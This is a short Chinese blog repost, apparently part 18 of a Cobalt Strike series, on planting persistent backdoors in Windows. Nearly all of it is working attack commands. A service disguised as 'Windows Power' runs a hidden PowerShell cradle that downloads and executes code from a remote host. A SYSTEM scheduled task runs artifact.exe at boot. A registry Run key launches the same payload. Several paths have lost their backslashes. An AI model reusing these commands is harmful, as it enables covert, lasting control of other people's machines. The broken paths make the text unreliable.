我是靠谱客的博主 雪白黄豆,最近开发中收集的这篇文章主要介绍Cobalt Strike(十八)可持续后门的使用1.服务自动启动2.计划任务3.注册表启动,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

1.服务自动启动

sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(' http://192.168.0.150:80/a'))""

sc config "Windows Power" start= auto

sc description "Windows Power" "windows auto service"

net start "Windows Power"

sc delete "Windows Power"

sc create "server power" binpath= "C:UsersAdministratorDesktopartifact.exe"

sc description "server power" "description" 设置服务的描述字符串

sc config "server power" start= auto 设置这个服务为自动启动

net start "server power" 启动服务

2.计划任务

创建任务

schtasks /create /tn "windowsup" /tr "C:artifact.exe" /ru SYSTEM /sc onstart

删除任务

schtasks /delete /tn windowsup

查询任务

chcp 437错误: 无法加载列资源。

s 请修改字符集

schtasks /query /tn windowsup

手工运行任务

schtasks /run /tn windowsup

3.注册表启动

reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "Keyname" /t REG_SZ /d "C:artifact.exe" /f

最后

以上就是雪白黄豆为你收集整理的Cobalt Strike(十八)可持续后门的使用1.服务自动启动2.计划任务3.注册表启动的全部内容,希望文章能够帮你解决Cobalt Strike(十八)可持续后门的使用1.服务自动启动2.计划任务3.注册表启动所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(44)

评论列表共有 0 条评论

立即
投稿
返回
顶部